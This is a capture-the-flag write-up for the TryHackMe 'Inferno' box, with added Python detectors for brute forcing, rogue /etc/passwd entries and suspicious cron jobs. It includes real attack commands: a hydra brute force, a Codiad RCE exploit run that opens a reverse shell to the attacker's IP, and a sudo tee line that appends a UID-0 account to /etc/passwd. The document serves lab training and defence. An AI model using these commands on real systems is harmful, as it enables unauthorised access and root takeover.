Inferno — TryHackMe
Write-up for TryHackMe’s room named Inferno: Real Life machine vs CTF. The machine is designed to be real-life and is perfect for newbies starting out in penetration testing. This room can be found here:
This is a straightforward boot2root box where we need to find the user and root flags. So let’s jump right into enumeration with nmap.
Run a simple nmap scan to check what is running on this box.
kali@kali:/tmp$ nmap -sC -sV 10.10.246.58
Starting Nmap 7.91 ( https://nmap.org ) at 2021-02-13 13:15 EST
Nmap scan report for 10.10.246.58
Host is up (0.083s latency).
Not shown: 967 closed ports
PORT STATE SERVICE VERSION
21/tcp open tcpwrapped
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| 2048 d7:ec:1a:7f:62:74:da:29:64:b3:ce:1e:e2:68:04:f7 (RSA)
| 256 de:4f:ee:fa:86:2e:fb:bd:4c:dc:f9:67:73:02:84:34 (ECDSA)
|_ 256 e2:6d:8d:e1:a8:d0:bd:97:cb:9a:bc:03:c3:f8:d8:85 (ED25519)
23/tcp open tcpwrapped
25/tcp open tcpwrapped
|_smtp-commands: Couldn't establish connection on port 25
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Dante's Inferno
88/tcp open tcpwrapped
106/tcp open pop3pw?
110/tcp open tcpwrapped
389/tcp open tcpwrapped
464/tcp open tcpwrapped
636/tcp open tcpwrapped
777/tcp open tcpwrapped
783/tcp open tcpwrapped
808/tcp open ccproxy-http?
873/tcp open tcpwrapped
1001/tcp open tcpwrapped
1236/tcp open tcpwrapped
1300/tcp open tcpwrapped
2000/tcp open tcpwrapped
2003/tcp open tcpwrapped
2121/tcp open tcpwrapped
2601/tcp open tcpwrapped
2602/tcp open tcpwrapped
2604/tcp open tcpwrapped
2605/tcp open tcpwrapped
2607/tcp open tcpwrapped
2608/tcp open tcpwrapped
4224/tcp open tcpwrapped
5051/tcp open tcpwrapped
5432/tcp open tcpwrapped
5555/tcp open tcpwrapped
5666/tcp open tcpwrapped
6346/tcp open tcpwrapped
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 22.98 seconds
A lot! Maybe this is to throw us off. So let’s concentrate on port 80 first, where we see a simple page. We can brute force this web page to find other directories which might be available. We will use ffuf to do this.
└─$ ffuf -u http://10.10.121.4/FUZZ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -c
:: Method : GET
:: URL : http://10.10.121.4/FUZZ
:: Wordlist : FUZZ: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200,204,301,302,307,401,403
inferno [Status: 401, Size: 458, Words: 42, Lines: 15]
[Status: 200, Size: 638, Words: 63, Lines: 37]
server-status [Status: 403, Size: 276, Words: 20, Lines: 10]
:: Progress: [220546/220546] :: Job [1/1] :: 419 req/sec :: Duration: [0:08:46] :: Errors: 0 ::
Exploring /inferno, we get a login prompt:
Trying a few combinations and intercepting the request in Burp, we can see that it is simple HTTP Basic Authentication, which we can brute force using hydra.
Tried brute-forcing with a few usernames like inferno, dante and admin. Finally got a password for the username admin.
hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.10.121.4 -m /inferno http-get
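From the defender's side, the brute force above is loud: every wrong password is a 401 in the Apache access log against the same path from the same client, usually followed by a 200 once the password is guessed. The following is an added example, not part of the original write-up, that parses Apache combined-format log lines and flags that pattern. The log lines are constructed for the demo (the attacker IP is the one used in the write-up, the timestamps are invented); the threshold and window are assumptions you would tune.

```python
import re
from collections import defaultdict, deque
from datetime import datetime

# Apache "combined" log format: client, ident, user, [timestamp], "request", status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) '
)


def parse_line(line):
    """Parse one access-log line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    rec["status"] = int(rec["status"])
    return rec


def detect_basic_auth_bruteforce(log_text, threshold=10, window_seconds=60):
    """Flag clients that produce `threshold` or more 401 responses against the same
    path within `window_seconds`, and record whether a 200 from that client on that
    path follows (i.e. a password was guessed). Returns {ip: finding_dict}."""
    recent = defaultdict(deque)   # (ip, path) -> timestamps of 401s inside the window
    total = defaultdict(int)      # (ip, path) -> every 401 seen
    alerts = {}
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        key = (rec["ip"], rec["path"])
        if rec["status"] == 401:
            total[key] += 1
            q = recent[key]
            q.append(rec["ts"])
            # drop failures that have aged out of the sliding window
            while q and (rec["ts"] - q[0]).total_seconds() > window_seconds:
                q.popleft()
            if len(q) >= threshold:
                alert = alerts.setdefault(rec["ip"], {"path": rec["path"], "success_after": False})
                alert["failures"] = total[key]
        elif rec["status"] == 200 and rec["ip"] in alerts and alerts[rec["ip"]]["path"] == rec["path"]:
            alerts[rec["ip"]]["success_after"] = True
            alerts[rec["ip"]]["user"] = rec["user"]
    return alerts


def _line(ip, user, second, status):
    """Build one constructed combined-format log line for the demo."""
    return (f'{ip} - {user} [13/Feb/2021:13:20:{second:02d} -0500] '
            f'"GET /inferno/ HTTP/1.1" {status} 458 "-" "Mozilla/5.0"')


# Constructed sample: one client hammering /inferno/ and then succeeding as admin,
# plus a legitimate user who mistypes once. Not the box's real log.
SAMPLE_LOG = "\n".join(
    [_line("10.8.98.192", "-", s, 401) for s in range(12)]
    + [_line("10.8.98.192", "admin", 12, 200),
       _line("192.168.1.20", "-", 30, 401),
       _line("192.168.1.20", "admin", 33, 200)]
)


if __name__ == "__main__":
    for ip, info in detect_basic_auth_bruteforce(SAMPLE_LOG).items():
        print(f"{ip}: {info['failures']} x 401 on {info['path']}, "
              f"success afterwards: {info['success_after']}")
```

In production the same logic is what fail2ban's apache-auth jail does against /var/log/apache2/access.log and error.log; the point of the "success after failures" flag is that it turns a noisy brute-force alert into a compromised-credential alert that needs a password reset, not just a ban.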
Using the above credentials, we get another login form; again we can try logging in with the same credentials:
We are able to log in and can see some kind of code repository or IDE:
Searching for “Codiad” on the internet, I found that it is a web-based IDE framework and also found an RCE exploit for it at:
Running the exploit as given kept failing with a 401 Not Authorized error.
We saw earlier that we had to log in twice, so the script needs the following parameters to run the exploit:
python3 exploit.py http://admin:XXXX@10.10.153.226/inferno/ admin XXXX 10.8.98.192 9999 linux
Where XXXX is the password found by hydra. Refer to this link for the explanation:
Let’s run the script and follow what it asks for, i.e. start the netcat listeners, and after some time we get our reverse shell:
You might notice that we are getting kicked out of our reverse shell periodically. There seems to be some kind of script running on the target which is doing it. I needed to run the exploit a few times; exploring the /home directory, I finally found a file named .download.dat under /home/dante/Downloads/, as we had permission to read dante’s home directory. Converting the hex content of .download.dat to ASCII gave us credentials for the user dante.
These turned out to be SSH credentials for dante, so I logged in and got local.txt:
First, check what we can run with sudo as the “dante” user:
So using sudo we can write to any file, so why not append to /etc/passwd a new user named “newroot” with user id 0? Read here for more privilege escalations like this:
openssl passwd -1 -salt newroot Password123
echo "newroot:\$1\$newroot\$6nAEFPEggbiFPRUX2BuQa/:0:0:root:/root:/bin/bash" | sudo tee -a /etc/passwd
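The appended line above is exactly what a host integrity check should catch: a second account with UID 0, and a password hash sitting in /etc/passwd instead of /etc/shadow. The following audit is an added example, not part of the original write-up; the passwd content is a constructed sample (the box's real file is not reproduced), with the write-up's own newroot line as the last entry.

```python
import re

# Constructed /etc/passwd sample for the demonstration (not a copy of the box's file);
# the last line is the kind of entry the write-up appends with `sudo tee -a`.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
dante:x:1000:1000:dante:/home/dante:/bin/bash
newroot:$1$newroot$6nAEFPEggbiFPRUX2BuQa/:0:0:root:/root:/bin/bash
"""

# crypt(3) hash prefixes: $1$ md5, $2*$ bcrypt, $5$ sha256, $6$ sha512, $y$ yescrypt
CRYPT_RE = re.compile(r"^\$(1|2[abxy]?|5|6|y|7)\$")
# values that mean "look in /etc/shadow" or "account locked"
LOCKED_OR_SHADOWED = {"x", "*", "!", "!!"}


def audit_passwd(text, expected_uid0=("root",)):
    """Return a list of (line_no, issue, account) for entries a defender should
    look at: extra UID-0 accounts, hashes stored in passwd instead of shadow,
    empty password fields, and malformed lines."""
    findings = []
    for line_no, line in enumerate(text.splitlines(), 1):
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            findings.append((line_no, "malformed", line))
            continue
        name, pw, uid, _gid, _gecos, _home, _shell = fields
        if uid == "0" and name not in expected_uid0:
            findings.append((line_no, "extra-uid0", name))
        if pw == "":
            # empty field means no password at all: anyone can log in as this user
            findings.append((line_no, "empty-password", name))
        elif pw not in LOCKED_OR_SHADOWED:
            # a real hash here is readable by every local user, and it bypasses shadow
            issue = "hash-in-passwd" if CRYPT_RE.match(pw) or len(pw) == 13 else "odd-password-field"
            findings.append((line_no, issue, name))
    return findings


def uid0_accounts(text):
    """List every account name that resolves to UID 0, in file order."""
    names = []
    for line in text.splitlines():
        fields = line.split(":")
        if len(fields) == 7 and fields[2] == "0":
            names.append(fields[0])
    return names


if __name__ == "__main__":
    print("UID 0 accounts:", uid0_accounts(SAMPLE_PASSWD))
    for line_no, issue, account in audit_passwd(SAMPLE_PASSWD):
        print(f"line {line_no}: {issue} ({account})")
```

Run it against a real system with `audit_passwd(open("/etc/passwd").read())`. The hash-in-passwd case is the one to prioritise: besides granting root, a hash in a world-readable file can be cracked offline by any local user. An auditd watch such as `-w /etc/passwd -p wa -k passwd_changes` gives you the write event itself, so you learn about the tee before the next login.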
We have rooted Inferno and got our proof.txt.
Now, if you are wondering how we were kicked out of our sessions all along: I used pspy to spy on the processes running on the target and noticed that a shell script “/var/www/html/machine_services1320.sh” is running every minute:
Here is what this script looks like:
Ah, the first command is killing the Bash shell; that is why we were getting kicked out. The rest of the commands are dummy Netcat sessions, and that’s why we saw so many open ports during our nmap scan. Sweet. The last point is where this cron job runs from, as I didn’t see any entry in /etc/crontab or /etc/cron.d, so I searched around and found the job here:
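The job above has three properties that make it easy to pick out without pspy: it runs every minute, it lives under the web root, and it was not registered in the usual system cron files. The following is an added example, not part of the original write-up: a small cron audit that walks the standard cron locations (the paths are the usual Debian/Ubuntu ones, which is an assumption about the target) relative to a chosen root directory, so it can be pointed at a mounted disk image as well as at a live host. The demo tree it builds is constructed for the example and only borrows the script name from the write-up.

```python
import stat
import tempfile
from pathlib import Path

# Standard cron locations, relative to a root so the audit can be pointed at a
# mounted image or a demo tree as well as at a live system ("/").
SYSTEM_CRON_FILES = ["etc/crontab"]
SYSTEM_CRON_DIRS = ["etc/cron.d"]
USER_CRONTAB_DIRS = ["var/spool/cron/crontabs", "var/spool/cron"]
SUSPICIOUS_PREFIXES = ("/var/www", "/tmp", "/dev/shm")


def parse_cron_line(line, system_file):
    """Return (schedule, user, command) or None for blank, comment and env lines.
    system_file=True means the line carries a user field (crontab, cron.d)."""
    parts = line.strip().split()
    if not parts or parts[0].startswith("#") or "=" in parts[0]:
        return None
    n = 1 if parts[0].startswith("@") else 5          # @reboot style vs five fields
    if len(parts) < n + (2 if system_file else 1):
        return None
    schedule = " ".join(parts[:n])
    if system_file:
        return schedule, parts[n], " ".join(parts[n + 1:])
    return schedule, None, " ".join(parts[n:])


def _cron_sources(root):
    """Yield (path, has_user_field, owner_from_filename) for every crontab found."""
    for rel in SYSTEM_CRON_FILES:
        if (root / rel).is_file():
            yield root / rel, True, None
    for rel in SYSTEM_CRON_DIRS:
        if (root / rel).is_dir():
            for p in sorted((root / rel).iterdir()):
                if p.is_file():
                    yield p, True, None
    for rel in USER_CRONTAB_DIRS:
        if (root / rel).is_dir():
            for p in sorted((root / rel).iterdir()):
                if p.is_file():
                    yield p, False, p.name        # per-user crontab: file name is the user


def audit_cron(root="/"):
    """Flag cron jobs that run every minute, reference web or temp paths, or
    execute a world-writable script. Returns a list of finding dicts."""
    root = Path(root)
    findings = []
    for path, system_file, owner in _cron_sources(root):
        for line in path.read_text(errors="replace").splitlines():
            parsed = parse_cron_line(line, system_file)
            if parsed is None:
                continue
            schedule, user, command = parsed
            user = user or owner
            reasons = []
            if schedule == "* * * * *":
                reasons.append("runs every minute")
            for prefix in SUSPICIOUS_PREFIXES:
                if prefix in command:
                    reasons.append(f"references {prefix}")
            target = command.split()[0]
            if target.startswith("/"):
                script = root / target.lstrip("/")
                if script.is_file() and script.stat().st_mode & stat.S_IWOTH:
                    reasons.append("world-writable script")
            if reasons and user == "root":
                reasons.append("runs as root")
            if reasons:
                findings.append({"file": str(path), "user": user, "schedule": schedule,
                                 "command": command, "reasons": reasons})
    return findings


def build_demo_tree():
    """Create a constructed mini filesystem (not the real box) with one benign
    system job and one root crontab entry modelled on the write-up's finding."""
    root = Path(tempfile.mkdtemp())
    (root / "etc/cron.d").mkdir(parents=True)
    (root / "var/spool/cron/crontabs").mkdir(parents=True)
    (root / "var/www/html").mkdir(parents=True)
    (root / "etc/crontab").write_text(
        "SHELL=/bin/sh\n17 * * * * root cd / && run-parts --report /etc/cron.hourly\n")
    script = root / "var/www/html/machine_services1320.sh"
    script.write_text("#!/bin/bash\n")
    script.chmod(0o777)                                # deliberately world-writable
    (root / "var/spool/cron/crontabs/root").write_text(
        "# m h dom mon dow command\n* * * * * /var/www/html/machine_services1320.sh\n")
    return str(root)


if __name__ == "__main__":
    for f in audit_cron(build_demo_tree()):
        print(f"{f['file']}: {f['user']} {f['schedule']} {f['command']} -> {', '.join(f['reasons'])}")
```

A root job that executes a script under /var/www is a finding on its own: the web root is where www-data can write, so anything the web application's account can modify ends up running as root every minute. Per-user crontabs in /var/spool/cron/crontabs are the location people forget to check, which is why the audit covers them alongside /etc/crontab and /etc/cron.d.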
Thanks for reading this. See you in another write up.